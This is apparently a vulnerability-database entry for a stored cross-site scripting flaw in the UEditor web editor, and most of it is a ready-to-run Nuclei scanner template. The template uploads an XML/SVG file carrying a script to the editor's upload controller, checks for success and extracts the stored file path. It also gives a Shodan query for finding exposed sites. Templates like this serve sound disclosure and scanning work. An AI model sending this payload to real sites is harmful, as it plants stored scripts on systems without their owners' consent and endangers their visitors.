ueditor-xss: ueditor - Cross Site Scripting

日期: 2025-08-01 | 影响软件: ueditor | POC: 已公开

漏洞描述

The latest vulnerability version of UEditor, a rich text web editor, allows for XML file uploads which can lead to stored cross-site scripting (XSS) attacks.

PoC代码[已公开]

id: ueditor-xss

info:
  name: ueditor - Cross Site Scripting
  author: pwnhxl
  severity: high
  description: |
    The latest vulnerability version of UEditor, a rich text web editor, allows for XML file uploads which can lead to stored cross-site scripting (XSS) attacks.
  reference:
    - https://blog.csdn.net/weixin_50464560/article/details/124803185
    - https://github.com/fex-team/ueditor/releases/tag/v1.4.3.3
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
    cvss-score: 7.2
    cwe-id: CWE-79
  metadata:
    verified: true
    max-request: 1
    shodan-query: title:"ueditor"
  tags: ueditor,xss,intrusive,vuln
variables:
  randstring: "{{to_lower(rand_base(16))}}"

http:
  - raw:
      - |
        POST /ueditor/php/controller.php?action=uploadfile HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundary{{randstring}}

        ------WebKitFormBoundary{{randstring}}
        Content-Disposition: form-data; name="upfile"; filename="test.xml"
        Content-Type: application/vnd.ms-excel

        <?xml version="1.0" standalone="no"?>
        <!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
        <svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
           <rect width="300" height="100" style="fill:rgb(0,0,255);stroke-width:3;stroke:rgb(0,0,0)" />
           <script type="text/javascript">
              alert(document.domain);
           </script>
        </svg>
        ------WebKitFormBoundary{{randstring}}--

    stop-at-first-match: true

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'state":"SUCCESS'
          - '.xml","title'
        condition: and

      - type: word
        part: header
        words:
          - "text/html"

      - type: status
        status:
          - 200

    extractors:
      - type: regex
        name: file_path
        part: body
        group: 1
        regex:
          - 'url":"(.*)","title'
# digest: 4a0a004730450220015e4a358143ada4d0a2278f14daf8311ee63be2e7ea6420b8921aa209e09942022100ba1ffc96fe7f2740a94d234b0c19c4b1e07c1460be1e5f18cdb4f1e6fd91e104:922c64590222798bb761d5b6d8e72950

相关漏洞推荐